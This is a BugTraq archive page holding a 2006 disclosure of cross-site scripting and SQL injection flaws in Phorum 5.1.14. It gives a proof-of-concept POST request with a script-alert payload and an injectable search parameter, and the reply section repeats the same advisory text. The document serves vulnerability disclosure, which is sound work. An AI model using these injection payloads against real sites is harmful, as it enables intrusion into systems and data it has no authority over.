BugTraq
Back to list
|
Post reply
Phorum 5.1.14 XSS SQL injection Vulnerability
Jul 11 2006 09:10AM
securityconnection gmail com
(1 replies)
Phorum 5.1.14
http://www.phorum.org
--------------------------
Cross Site Scripting (XSS)
--------------------------
POST http://target.xx:80/posting.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: target.xx
Content-Length: 447
message_id=0&forum_id=1&mode=<script>alert(/EllipsisSecurityTest/)</scri
pt>
-------------
SQL injection
-------------
http://target.xx/search.php?1,search=1,page='[SQL]
-----------------
Ellipsis Security
http://www.ellsec.org
[ reply ]
Re: Phorum 5.1.14 XSS SQL injection Vulnerability
Jul 16 2006 07:59PM
Maurice Makaay (maurice makaay internl net)
Privacy Statement
Copyright 2010, SecurityFocus
http://www.phorum.org
--------------------------
Cross Site Scripting (XSS)
--------------------------
POST http://target.xx:80/posting.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: target.xx
Content-Length: 447
message_id=0&forum_id=1&mode=<script>alert(/EllipsisSecurityTest/)</scri
pt>
-------------
SQL injection
-------------
http://target.xx/search.php?1,search=1,page='[SQL]
-----------------
Ellipsis Security
http://www.ellsec.org
[ reply ]